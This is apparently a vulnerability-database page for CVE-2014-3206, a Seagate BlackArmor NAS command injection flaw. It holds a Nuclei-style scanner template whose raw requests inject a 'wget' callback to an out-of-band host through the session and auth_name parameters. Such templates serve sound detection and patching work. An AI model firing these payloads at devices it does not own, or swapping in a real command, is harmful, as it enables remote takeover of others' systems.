CVE-2014-3206: Seagate BlackArmor NAS - Command Injection

2025-08-01 Seagate BlackArmor NAS PoC Public

Description

Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.

PoC

id: CVE-2014-3206

info:
  name: Seagate BlackArmor NAS - Command Injection
  author: gy741
  severity: critical
  description: Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands with the privileges of the affected device, potentially leading to unauthorized access, data loss, or further compromise of the network.
  remediation: |
    Apply the latest firmware update provided by Seagate to patch the command injection vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2014-3206
    - https://www.exploit-db.com/exploits/33159
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2014-3206
    cwe-id: CWE-20
    epss-score: 0.51014
    epss-percentile: 0.9887
    cpe: cpe:2.3:o:seagate:blackarmor_nas_220_firmware:-:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: seagate
    product: blackarmor_nas_220_firmware
  tags: cve2014,cve,seagate,rce,edb,vkev,vuln

http:
  - raw:
      - |
        GET /backupmgt/localJob.php?session=fail;wget+http://{{interactsh-url}}; HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
      - |
        GET /backupmgt/pre_connect_check.php?auth_name=fail;wget+http://{{interactsh-url}}; HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
# digest: 490a00463044022066a53265ae7d9c9a256a55c4b8665422f9702e0a8cb1ead7bad84e80d06df3d9022058f127cca1832996688887733e37080d1d33d7f3eb78484f28a0aca3c375d158:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities